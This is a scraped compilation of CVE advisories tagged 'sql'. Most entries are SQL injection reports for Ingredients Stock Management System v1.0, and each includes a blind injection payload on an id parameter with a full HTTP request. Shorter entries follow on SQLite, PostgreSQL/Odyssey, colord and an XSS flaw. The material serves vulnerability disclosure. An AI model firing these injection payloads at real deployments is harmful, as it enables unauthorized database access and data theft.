Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /items/manage_item.php.

Permalink

Cannot retrieve contributors at this time

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/items/manage\_item.php

Vulnerability location: /isms/admin/items/manage\_item.php, id

db\_name = isms\_db;length=7

\[+\] Payload: isms/admin/items/manage\_item.php?id=4%27%20and%20length(database())%20=%207--+ // Leak place ---> id

GET /isms/admin/items/manage\_item.php?id\=4%27%20and%20length(database())%20\=%207\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

When length (database ()) = 7 

When length (database ()) = 6

CVE-2022-36700: vul-wiki/SQLi-13.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /categories/manage_category.php.

Permalink

Cannot retrieve contributors at this time

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/categories/manage\_category.php

Vulnerability location: /isms/admin/categories/manage\_category.php, id

db\_name = isms\_db;length=7

\[+\] Payload: isms/admin/categories/manage\_category.php?id=3%27%20and%20length(database())%20=%207--+ // Leak place ---> id

GET /isms/admin/categories/manage\_category.php?id\=3%27%20and%20length(database())%20\=%207\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

When length (database ()) = 7 

When length (database ()) = 6

CVE-2022-36699: vul-wiki/SQLi-11.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /stocks/manage_stockin.php.

Permalink

Cannot retrieve contributors at this time

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/stocks/manage\_stockin.php

Vulnerability location /isms/admin/stocks/manage\_stockin.php, iid

db\_name = isms\_db;length=7

\[+\] Payload: /isms/admin/stocks/manage\_stockin.php?iid=4&id=4%27%20and%20length(database())%20=%207--+ // Leak place ---> iid

GET /isms/admin/stocks/manage\_stockin.php?iid\=4&id\=4%27%20and%20length(database())%20\=%207\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

When length (database ()) = 7 

When length (database ()) = 6

CVE-2022-36703: vul-wiki/SQLi-14.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /categories/view_category.php.

Permalink

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/categories/view\_category.php

Vulnerability location: /isms/admin/categories/view\_category.php, id

db\_name = isms\_db;length=7

\[+\] Payload: /isms/admin/categories/view\_category.php?id=3%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /isms/admin/categories/view\_category.php?id\=3%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

When length (database ()) = 7 

When length (database ()) = 6

CVE-2022-36698: vul-wiki/SQLi-10.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /items/view_item.php.

Permalink

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/items/view\_item.php

Vulnerability location: /isms/admin/items/view\_item.php, id

db\_name = isms\_db;length=7

\[+\] Payload: isms/admin/items/view\_item.php?id=3%27%20and%20length(database())%20=%207--+ // Leak place ---> id

GET /isms/admin/items/view\_item.php?id\=4%27%20and%20length(database())%20\=%207\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

When length (database ()) = 7 

When length (database ()) = 6

CVE-2022-36701: vul-wiki/SQLi-12.md at master · k0xx11/vul-wiki

An issue was found in fts5UnicodeTokenize() in ext/fts5/fts5_tokenize.c in Sqlite. A unicode61 tokenizer configured to treat unicode "control-characters" (class Cc), was treating embedded nul characters as tokens. The issue was fixed in sqlite-3.34.0 and later.

@@ -1,5 +1,5 @@

C Minor\\stweaks\\sto\\squery\\splanning\\sweights\\sso\\sthat\\swhen\\sSTAT4\\sis\\senabled\\nand\\sfunctioning,\\sa\\sfull\\stable\\sscan\\sis\\smore\\slikely\\sto\\sbe\\sselected\\sif\\nthat\\sseems\\slike\\sthe\\sfastest\\ssolution.\\s\\sOnly\\sdo\\sthis\\swhen\\sSTAT4\\sinfo\\nis\\savailable\\sbecause\\san\\serror\\shas\\sa\\slarge\\spotential\\sdownside.

D 2020-10-22T18:50:30.660

C Prevent\\sfts5\\stokenizer\\sunicode61\\sfrom\\sconsidering\\s'\\\\0'\\sto\\sbe\\sa\\stoken\\scharacters,\\seven\\sif\\sother\\scharacters\\sof\\sclass\\s"Cc"\\sare.

D 2020-10-26T13:24:36.019

F .fossil-settings/empty-dirs dbb81e8fc0401ac46a1491ab34a7f2c7c0452f2f06b54ebb845d024ca8283ef1

F .fossil-settings/ignore-glob 35175cdfcf539b2318cb04a9901442804be81cd677d8b889fcc9149c21f239ea

F LICENSE.md df5091916dbb40e6e9686186587125e1b2ff51f022cc334e886c19a0e9982724

@@ -125,7 +125,7 @@ F ext/fts5/fts5\_tcl.c 39bcbae507f594aad778172fa914cad0f585bf92fd3b078c686e249282

F ext/fts5/fts5\_test\_mi.c 08c11ec968148d4cb4119d96d819f8c1f329812c568bac3684f5464be177d3ee

F ext/fts5/fts5\_test\_tok.c f96c6e193c466711d6d7828d5f190407fe7ab897062d371426dd3036f01258e7

F ext/fts5/fts5\_tokenize.c 6f47244681c670ec3c1364f19b2ec0cca191249ff3543755a65e1fc1df348061

F ext/fts5/fts5\_unicode2.c 8bd0cd07396b74c1a05590e4070d635bccfc849812c305619f109e6c0485e250

F ext/fts5/fts5\_unicode2.c 85f64663cbd8ddd09d3a1e8823759b07085018b4a53158632e264cd785f88763

F ext/fts5/fts5\_varint.c e64d2113f6e1bfee0032972cffc1207b77af63319746951bf1d09885d1dadf80

F ext/fts5/fts5\_vocab.c 7a071833064dc8bca236c3c323e56aac36f583aa2c46ce916d52e31ce87462c9

F ext/fts5/fts5parse.y eb526940f892ade5693f22ffd6c4f2702543a9059942772526eac1fde256bb05

@@ -214,7 +214,7 @@ F ext/fts5/test/fts5simple2.test 258a1b0c590409bfa5271e872c79572b319d2a56554d058

F ext/fts5/test/fts5simple3.test d5c74a9d3ca71bd5dd5cacb7c55b86ea12cdddfc8b1910e3de2995206898380f

F ext/fts5/test/fts5synonym.test 1651815b8008de170e8e600dcacc17521d765482ea8f074ae82cfa870d8bb7fb

F ext/fts5/test/fts5synonym2.test b54cce5c34ec08ed616f646635538ae82e34a0e28f947ec60b6fadbc4b3fb17a

F ext/fts5/test/fts5tok1.test ce6551e41ff56f30b69963577324624733bed0d1753589f06120d664d9cd45c9

F ext/fts5/test/fts5tok1.test 1f7817499f5971450d8c4a652114b3d833393c8134e32422d0af27884ffe9cef

F ext/fts5/test/fts5tok2.test dcacb32d4a2a3f0dd3215d4a3987f78ae4be21a2

F ext/fts5/test/fts5tokenizer.test ac3c9112b263a639fb0508ae73a3ee886bf4866d2153771a8e8a20c721305a43

F ext/fts5/test/fts5trigram.test e2ce256fd0ccd6707e740aa3596206aedb0d5834b100c0cb49e344dcd1d8463c

@@ -1883,8 +1883,7 @@ F vsixtest/vsixtest.tcl 6a9a6ab600c25a91a7acc6293828957a386a8a93

F vsixtest/vsixtest.vcxproj.data 2ed517e100c66dc455b492e1a33350c1b20fbcdc

F vsixtest/vsixtest.vcxproj.filters 37e51ffedcdb064aad6ff33b6148725226cd608e

F vsixtest/vsixtest\_TemporaryKey.pfx e5b1b036facdb453873e7084e1cae9102ccc67a0

P 602d7369166d406a26834aa47d71d565a17d377d32e41f308821a50b41f91896 27c681c9c6672ad7098d8ff2c41e76d3e9e55866b6327ed85e73f63bd623ceed

R 095b8371453be15a7f4050e63d8f5ae1

T +closed 27c681c9c6672ad7098d8ff2c41e76d3e9e55866b6327ed85e73f63bd623ceed

U drh

Z 659678ebc16d4efb69a249c55f704f9a

P 0e7e113d9f2c929c1f8a85e2cfad8e2e60f0e8770212b5e5320fb2a2c42911f8

R a15b27345243be33c21a5da39e6aa93d

U dan

Z e39d799402b3f14cd8d6cc9e6595e926

CVE-2021-20223: Prevent fts5 tokenizer unicode61 from considering '\0' to be a token … · sqlite/sqlite@d1d43ef

Odyssey passes to server unencrypted bytes from man-in-the-middle When Odyssey is configured to use certificate Common Name for client authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption. This is similar to CVE-2021-23214 for PostgreSQL.

**CVE-2021-23214****Server processes unencrypted bytes from man-in-the-middle**

When the server is configured to use trust authentication with a clientcert requirement or to use cert authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption. This is similar to CVE-2011-0411 (different product).

The PostgreSQL project thanks Jacob Champion for reporting this problem.

**Version Information**

Affected Version

Fixed In

Fix Published

14

14.1

2021-11-11

13

13.5

2021-11-11

12

12.9

2021-11-11

11

11.14

2021-11-11

10

10.19

2021-11-11

9.6

9.6.24

2021-11-11

For more information about PostgreSQL versioning, please visit the versioning page.

**CVSS 3.0**

Overall Score

**8.1**

Component

core server

Vector

AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

**Reporting Security Vulnerabilities**

If you wish to report a new security vulnerability in PostgreSQL, please send an email to security@postgresql.org.

For reporting non-security bugs, please see the Report a Bug page.

CVE-2021-43766: Server processes unencrypted bytes from man-in-the-middle

Odyssey passes to client unencrypted bytes from man-in-the-middle When Odyssey storage is configured to use the PostgreSQL server using 'trust' authentication with a 'clientcert' requirement or to use 'cert' authentication, a man-in-the-middle attacker can inject false responses to the client's first few queries. Despite the use of SSL certificate verification and encryption, Odyssey will pass these results to client as if they originated from valid server. This is similar to CVE-2021-23222 for PostgreSQL.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-43767: Issues · yandex/odyssey

There are two Information Disclosure vulnerabilities in colord, and they lie in colord/src/cd-device-db.c and colord/src/cd-profile-db.c separately. They exist because the 'err_msg' of 'sqlite3_exec' is not releasing after use, while libxml2 emphasizes that the caller needs to release it.

According to libsqlite3 API document, "To avoid memory leaks, the application should invoke sqlite3\_free() on error message strings returned through the 5th parameter of sqlite3\_exec() after the error message string is no longer needed."

rc = sqlite3\_exec (priv->db, "SELECT \* FROM properties\_v2 LIMIT 1",

NULL, NULL, &error\_msg);

if (rc != SQLITE\_OK) {

statement = "CREATE TABLE properties\_v2 ("

"device\_id TEXT,"

"property TEXT,"

"value TEXT,"

"PRIMARY KEY (device\_id, property));";

sqlite3\_exec (priv->db, statement, NULL, NULL, NULL);

}

return TRUE;

CVE-2021-42523: potential memory leak: forgetting to free error message of libsqlite3 API 'sqlite3_exec' -1 · Issue #110 · hughsie/colord

MDaemon Technologies SecurityGateway for Email Servers 8.5.2 is vulnerable to Cross Site Scripting (XSS) via the currentRequest parameter.

Tag

#sql